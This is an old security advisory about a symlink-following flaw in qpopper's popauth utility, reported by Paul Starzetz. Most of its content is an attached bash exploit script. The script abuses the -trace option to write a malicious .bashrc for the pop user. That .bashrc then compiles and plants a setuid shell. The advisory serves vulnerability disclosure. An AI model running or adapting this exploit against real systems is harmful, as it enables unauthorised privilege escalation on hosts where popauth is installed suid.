COMMAND

	popauth symlink problem

SYSTEMS AFFECTED

	 current version of popauth (packaged with qpopper)

PROBLEM

	Paul Starzetz reported following :
	

	there is a symlink problem in the popauth utility, which is part of  the
	qpoper package. The binary  is  often  istalled  suid  pop  and  follows
	symlinks in the -trace file option. This problem has  been  reported  to
	vendors in June 2001.
	

	Impact: in case of suid popauth  and  valid  shell  for  user  pop,  the
	attached script will create suid-pop shell, if someone su to  pop.  This
	may happen as a part of some automated check script (startup script).
	

	This vulnerability is not very crucial, however it  should  be  reported
	at least once.
	

	 Script

	 =======

	

	

	--------------50454D7A3503FA206F88387D

	Content-Type: application/x-sh;

	 name=\"mkbs2.sh\"

	Content-Transfer-Encoding: 7bit

	Content-Disposition: inline;

	 filename=\"mkbs2.sh\"

	

	#!/bin/bash

	

	# popauth symlink follow vuln by IhaQueR

	# this will create .bashrc for user pop

	# and ~pop/sup suid shell

	

	FILE=$(perl -e \'print \"/tmp/blah1\\\"\\ncd ~\\necho >blah.c \\\"#include <stdio.h>\\nmain(){setreuid(geteuid(),getuid());execlp(\\\\\\\"bash\\\\\\\", \\\\\\\"bash\\\\\\\",NULL);}\\\"\\ngcc blah.c -o sup\\nchmod u+s sup\\necho done\\n\\n\\\"\"\')

	

	ln -s /var/lib/pop/.bashrc \"$FILE\"

	

	/usr/sbin/popauth -trace \"$FILE\"

	

	--------------50454D7A3503FA206F88387D--

	

SOLUTION

	Nothing yet.